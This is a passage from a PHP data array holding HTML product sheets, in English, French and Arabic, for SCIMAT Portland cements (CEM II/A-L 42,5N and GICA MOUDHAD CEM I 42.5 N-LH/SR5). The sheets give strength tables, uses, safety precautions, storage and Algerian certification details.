<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Specified Upper Limit of our Cement</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
</tr>
<tr>
<td style="height:85px; width:110px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 days</strong></span></span></p>
</td>
<td style="height:85px; width:142px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
</td>
<td style="height:85px; width:120px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>22.08</strong></span></span></p>
</td>
<td style="height:85px; width:151px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>25.98</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:57px; width:110px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 days</strong></span></span></p>
</td>
<td style="height:57px; width:142px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>62.5≤res≥42,5</strong></span></span></p>
</td>
<td style="height:57px; width:120px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>44,18</strong></span></span></p>
</td>
<td style="height:57px; width:151px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>48.49</strong></span></span></p>
</td>
</tr>
</tbody>
</table>
<div style="clear:both;"> </div>
<div style="clear:both;">
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Quality Control</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">SCIMAT manufactures and markets <strong>Quality</strong> Cements in accordance with Algerian Standards in force. They are periodically checked by the Center for Studies and Technological Services of the Building Materials Industry -CETIM- (accredited according to the ISO 17025 Standard).</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Main fields of employment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong>is suitable for all types of reinforced concrete work. Our Cement is suitable for prestressed concrete and reinforced concrete. In general, the<strong> CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong> is well suited for massive work requiring a moderate rise in temperature. The Class R will be preferred for work requiring higher initial strengths. For work in aggressive environments, the Cement will be used for work at sea (PM) or resistant to sulphated water (ES).</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Special precautions</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">When the aesthetic aspect is important (raw concrete, plasters), it is advisable to avoid the use of certain <strong>CEM II</strong> comprising large proportions of constituents liable to cause too marked variations in color, particularly fly ash.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Specific and General Recommendations</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use clean aggregates, free from organic matter;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Respect the dosages and the rules of the art for the<br />
implementation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Aim for a Water /Cement ratio, preferably as low<br />
as possible, compatible with good rheology of<br />
fresh concrete;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use standardized adjuvants;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid premature drying out in hot or windy weather by curing the concrete (watering, damp tarpaulin, curing products, etc.); </span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Adapt the vibration of the concrete to its consistency<br />
to obtain optimum compactness without segregation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid all contact with skin and eyes;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use suitable equipment : gloves, waterproof shoes, glasses, etc.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><strong><u>Security</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The SCIMAT aims to be the safest employer in the Society by improving working conditions to avoid any bodily injury and health repercussions related to its activities.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Protective Measures</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mix with water, the Cement is irritating;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Avoid contact with eyes and skin;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Immediately wash all exposed areas with plenty of water;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> In the event of contact with the eyes, it is essential to consult a doctor.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">For more details, please refer to the detailed Safety Data Sheet.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Environment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">The SCIMAT aims to be a constant example of the ecological responsibility of the </span>Society<span style="color:#000000"> through the protection of the environment, including the prevention of pollution and the use of sustainable resources by:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Preservation of natural resources;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Reduction of atmospheric emissions;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mastery of waste management.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><u><strong>Storage</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The Cement must be stored in a dry place and protected from humidity.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>Conditioning</u> :</strong></span><br />
The <strong>Cement Portland CEM II / AL 42.5N-NA 442/2013-</strong> is delivered in bulk and in bags of 50 kg.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#4B0082">Certification</span></strong></u><strong><span style="color:#4B0082"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement Portland CEM II / AL 42.5N</strong> is certified according to the <strong>Algerian Standard 442/2013</strong> with the National Conformity Mark <strong>TEDJ</strong> issued by the Algerian Institute for Standardization -IANOR-.</span></span></p>
</div>
',
'img_prd' => 'produit-1716888973.png',
'img_prd_detail' => '',
'Code_Pr' => '78999',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1716804329.pdf',
'pos_slider' => '9'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 1 => array(
'Produit' => array(
'id' => '89963',
'nom_fr' => 'GICA MOUDHAD ',
'nom_ara' => 'جيكا مضاد',
'nom_en' => 'GICA MOUDHAD',
'sous_nom_fr' => 'CEM I 42.5 N-LH/SR5',
'sous_nom_ara' => 'CEM I 42.5 N-LH/SR5',
'sous_nom_en' => 'CEM I 42.5 N-LH/SR5',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:black">Le <strong>Ciment CEM I/42.5 N-LH/SR5 -NA 442/2013</strong>- </span> est un Ciment Portland résultant du broyage de clinker et de sulfate de calcium (gypse ou anhydrite) pour régulariser la prise, et éventuellement de constituants secondaires en faible quantité inférieure à 5 %. La teneur en clinker est au minimum de 95 %.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000"><u>Valeurs limites</u> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En plus des valeurs caractéristiques des classes de résistance, la Norme prévoit le respect de valeurs limites de résistance à la compression applicables à chaque résultat d’essai. Ces résistances sont mesurées sur «mortier normal» selon la <strong>Norme NA 442-2013 </strong>inspirée de la <strong>Norme Européenne NF EN 196-1</strong>.</span></span></p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong>Valeur Limite de Résistance à la Compression pour CEM I/42.5 N-LH/SR5</strong></span></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:339px; width:420px">
<tbody>
<tr>
<td style="height:104px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Classe de Résistance</strong></span></span></p>
</td>
<td style="height:104px; width:145px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite de la Résistance selon la Norme NA 442</strong></span></span></p>
</td>
<td style="height:104px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Inférieure Spécifiée de notre Ciment</strong></span></span></p>
</td>
<td style="height:104px; width:139px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Supérieure Spécifiée de notre Ciment</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:29px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 jours</strong></span></span></p>
</td>
<td style="height:29px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:29px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">21,36</span> </strong></span></span></p>
</td>
<td style="height:29px; width:139px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">27,71</span></strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:48px; width:117px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 jours</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">62.5≤res≥42,5</span> </strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; width:123px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">44,82</span> </strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; text-align:center; width:139px">
<p> </p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>54,53</strong></span></span></p>
<p> </p>
</td>
</tr>
</tbody>
</table>
<div style="page-break-after: always"><span style="display:none"> </span></div>
<p> </p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Les propriétés chimiques, qui sont un facteur important de la résistance des bétons à des ambiances agressives, concernent la teneur en anhydride sulfurique (SO3) inférieure à 3.0 % (3,5 % pour les classes 42,5 R et 52,5) et en ions chlorure inférieure à 0,10 %.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Contrôle de la Qualité</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT fabrique et commercialise des Ciments de <strong>Qualité </strong>conformément aux Normes Algériennes en vigueur. Ils sont contrôlés périodiquement par le Centre d’Études et de Services Technologiques de l’Industrie des Matériaux de Construction -CETIM-(accrédité selon le Référentiel ISO 17025). </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000"><u>Principaux domaines d’emploi</u> </span><span style="color:green">:</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Ciment CEM I / 42.5 N-LH/SR5 </strong>convient pour le béton<a href="https://www.infociments.fr/glossaire/beton-arme" title="Béton armé"> </a>armé ou le béton précontraint, en revanche leurs caractéristiques mécaniques n’en justifient généralement pas l’emploi pour les travaux de maçonnerie courante et les bétons en grande masse ou faiblement armés.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Ciment CEM I / 42.5 N-LH/SR5</strong> permet un décoffrage rapide appréciable notamment en préfabrication. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour les travaux en milieu agressif, eaux de mer ou eaux sulfatées, on emploiera respectivement le Ciment Portland <strong>CEM I 42.5 N-LH/SR5 </strong>pour travaux à la mer PM, ou pour travaux en eaux à haute teneur en sulfates ES.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#008000">Précautions particulières</span></u><span style="color:green"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour les ouvrages massifs, on évitera l’utilisation du <strong>Ciment CEM I 42.5 N-LH/SR5 </strong>dont la chaleur d’hydratation risque de conduire à une élévation de température excessive lors de leur réalisation.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations Spécifiques et Générales</u> :</strong></span></span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des granulats propres, exempts de matières organiques;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Respecter les dosages et les règles de l’art pour la mise en œuvre;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Viser un rapport Eau/Ciment de préférence le plus faible possible, compatible avec une bonne rhéologie du béton frais;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des adjuvants normalisés;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter une dessiccation précoce par temps chaud ou venteux en réalisant une cure du béton (arrosage, bâche humide, produits de cure…);</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Adapter la vibration du béton à sa consistance pour obtenir une compacité optimale sans ségrégation;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter tout contact avec la peau et les yeux;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des équipements adaptés : gants, chaussures imperméables, lunettes…</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><u><strong>Sécurité</strong></u> :<strong> </strong></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être l'employeur le plus sûr de la Société par l’amélioration des conditions de travail pour éviter toutes blessures corporelles et répercussions sanitaires liées à ses activités.</span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><span style="color:#008000"><strong>Mesures de Protection</strong></span></u><span style="color:#008000"><strong> :</strong></span></span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Mélanger à l'eau, le Ciment est irritant; </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Éviter le contact avec les yeux et la peau;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Laver immédiatement et abondamment à l'eau toute zone exposée; </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En cas de contact avec les yeux, consulter impérativement un médecin. </span></span></span></p>
</li>
</ul>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour plus de détails,Veuillez- vous reporter à la Fiche de Données de Sécurité détaillée.</span></span></span></p>
<div class="source_url_spacer">
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Environnement</strong></u><strong> :</strong></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être en permanence un exemple de la responsabilité écologique de la Société par la protection de l’environnement, y compris la prévention de la pollution et l’utilisation de ressources durables et ce par<em> </em> :</span></span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La préservation des ressources naturelles;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La réduction des rejets atmosphériques;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La maitrise de la gestion des déchets. </span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"> <u><strong>Stockage</strong></u><strong> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le Ciment doit être stocké au sec et protégé de l'humidité. </span> <span style="color:#008000"><strong> </strong></span></span></span></p>
<p><span style="color:#40E0D0"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Conditionnement</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le </span><strong>Ciment CEM I 42.5 N-LH/SR5</strong><span style="color:#000000"> est livré en vrac et en sacs de 50 kg.</span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#000080">Certification</span></u><span style="color:#000000"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le </span><strong>Ciment CEM I 42.5 N-LH/SR5 </strong><span style="color:#000000"> est certifié selon la <strong>Norme Algérienne 442/2013 </strong>à la Marque de Conformité Nationale <strong>TEDJ</strong> délivrée par l’Institut Algérien de Normalisation -IANOR-.</span></span></span></p>
</div>
',
'contenu_ara' => '<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>التركيبة :</strong></u></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> هو اسمنت بورتلاند ناتج عن طحن الكلنكر وكبريتات الكالسيوم (الجبس أو الأنهيدريت) لتنظيم الإعداد ، وربما المكونات الثانوية بكميات صغيرة بنسبة 5٪. محتوى الكلنكر 95٪ على الأقل.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>القيم الحدية</strong></u></span></span></span> <span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">بالإضافة إلى القيم المميزة لفئات القوة ، توفر المواصفة القياسية الامتثال لقيم حد مقاومة الانضغاط المطبقة على كل نتيجة اختبار. يتم قياس هذه المقاومة على "ملاط عادي" وفقًا للمعيار <strong>NA 442-2013</strong> المستوحى من المعيار الأوروبي <strong>NF EN</strong> <strong>196-1</strong>.</span></span></p>
<p dir="rtl" style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong>قيمة حد مقاومة الضغط لـ</strong> </span></span></span><span style="color:#008000"><strong><span style="font-family:georgia,serif; font-size:12.0pt">CEM I / 42.5 N-LH/SR5</span></strong></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" dir="rtl">
<thead>
<tr>
<th scope="col" style="height:104px; width:117px">
<p style="text-align:center"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>فئة المقاومة</strong></span></span></small></p>
</th>
<th scope="col" style="height:104px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">حد القوة وفقًا للمعيار<br />
NA 442</span></span></small></strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong> </strong></span></span></p>
<p style="text-align:center"> </p>
</th>
<th scope="col" style="height:104px; width:123px">
<p dir="rtl" style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحد الأدنى المحدد </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>لاسمنت SCIMAT</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong> </strong></span></span></p>
</th>
<th scope="col" style="height:104px; width:139px">
<p style="text-align:center"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأعلى<br />
المحدد لاسمنت SCIMAT</strong></span></span></small></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="height:30px; text-align:center; width:117px">
<p><strong>يومان</strong></p>
</td>
<td style="height:30px; text-align:center; width:145px">
<p><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> 10 </span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">≤</span></span></span></strong></p>
</td>
<td dir="ltr" style="height:30px; text-align:center; width:123px">
<p><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">21,36</span></span></span></strong></p>
</td>
<td style="height:30px; text-align:center; width:139px"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><span style="color:black">27,71</span></strong></span></span></td>
</tr>
<tr>
<td style="height:30px; text-align:center; width:117px">
<p><span style="font-size:16px"><strong>28 يوم</strong></span></p>
</td>
<td style="height:30px; text-align:center; width:145px">
<p><strong><span style="font-family:times new roman,times,serif"><span style="font-size:14px"><span style="color:black">42,5 ≤ <span dir="ltr" lang="fr">res</span>≥62,5</span></span></span></strong></p>
</td>
<td style="height:30px; text-align:center; width:123px"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">44,82 </span></span></span></strong></td>
<td style="height:30px; text-align:center; width:139px"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">54,53</span></span></strong></td>
</tr>
</tbody>
</table>
<div style="clear:both;">
<div style="clear:both;"> </div>
<div style="clear:both;">
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الخصائص الكيميائية ، التي تعتبر عاملاً مهماً في مقاومة الخرسانة للبيئات العدوانية ، تتعلق بمحتوى أنهيدريد الكبريت (SO3) الذي يقل عن 3.0٪ (3.5٪ للفئتين 42.5 R و 52.5) وفي أيونات الكلوريد الأقل من 0.10 ٪.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>رقابة الجودة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تقوم SCIMAT بان<span style="color:#000000">ت</span>اج وتسويق الأسمنت عالي <strong>الجودة</strong> وفقًا للمعايير الجزائرية المعمول بها. يتم فحصها بشكل دوري من قبل مركز الدراسات والخدمات ا<span style="color:#000000">لتكنولوجية </span>لصناعة مواد البناء -CETIM-(المعتمد وفقًا لمعيار ISO 17025).</span></span></p>
<p dir="rtl" style="text-align:justify"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><strong><u>مجالات الاستعمال</u></strong></span><span style="color:#008000"><strong><u> الرئيسية</u> :</strong></span></span></span></small></p>
<p dir="rtl" style="text-align:justify"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong> <strong>CEM I / 42.5 N-LH / SR5</strong> مناسب للخرسانة المسلحة أو الخرسانة </span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">سابقة الإجهاد ، من ناحية أخرى فإن خصائصها الميكانيكية لا تبرر بشكل عام استخدامها لأعمال البناء العادية والخرسانة في كتلة كبيرة أو مقواة بشكل ضعيف.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يسمح </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> بتقشير سريع ملموس ، خاصة في التصنيع المسبق. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">للعمل في بيئة عدوانية أو مياه البحر أو المياه الكبريتية ، سيتم استخدام أسمنت بورتلاند <strong>CEM I 42.5 N-LH / SR5</strong> على التوالي للعمل في البحر مساءً ، أو للعمل في الماء الذي يحتوي على نسبة عالية من الكبريتات.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="color:#008000"><u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إحتياطات خاصة</span></span></strong></u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> : </span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">بالنسبة للهياكل الضخمة ، تجنب استخدام <strong> </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> ، حيث قد تؤدي حرارة الماء إلى ارتفاع مفرط في درجة الحرارة أثناء بنائها.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>توصيات محددة وعامة</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام ركام نظيف وخالي من المواد العضوية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> احترام الجرعات وقواعد فن التنفيذ ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تهدف إلى نسبة الماء / الأسمنت ، ويفضل أن تكون منخفضة قدر الإمكان ، ومتوافقة مع الانسيابية الجيدة للخرسانة الطازجة ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام مواد مساعدة معيارية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب الجفاف المبكر في الطقس الحار أو العاصف عن طريق معالجة الخرسانة (الري ، القماش المشمع الرطب ، منتجات المعالجة ، إلخ) ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تكييف اهتزازات الخرسانة مع قوامها للحصول على تماسك أمثل بدون فصل ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة الجلد والعينين ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدم المعدات المناسبة: القفازات ، والأحذية المقاومة للماء ، والنظارات ، وما إلى ذلك.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="color:#FF0000"><u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحماية</span></span></strong></u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></strong></span></p>
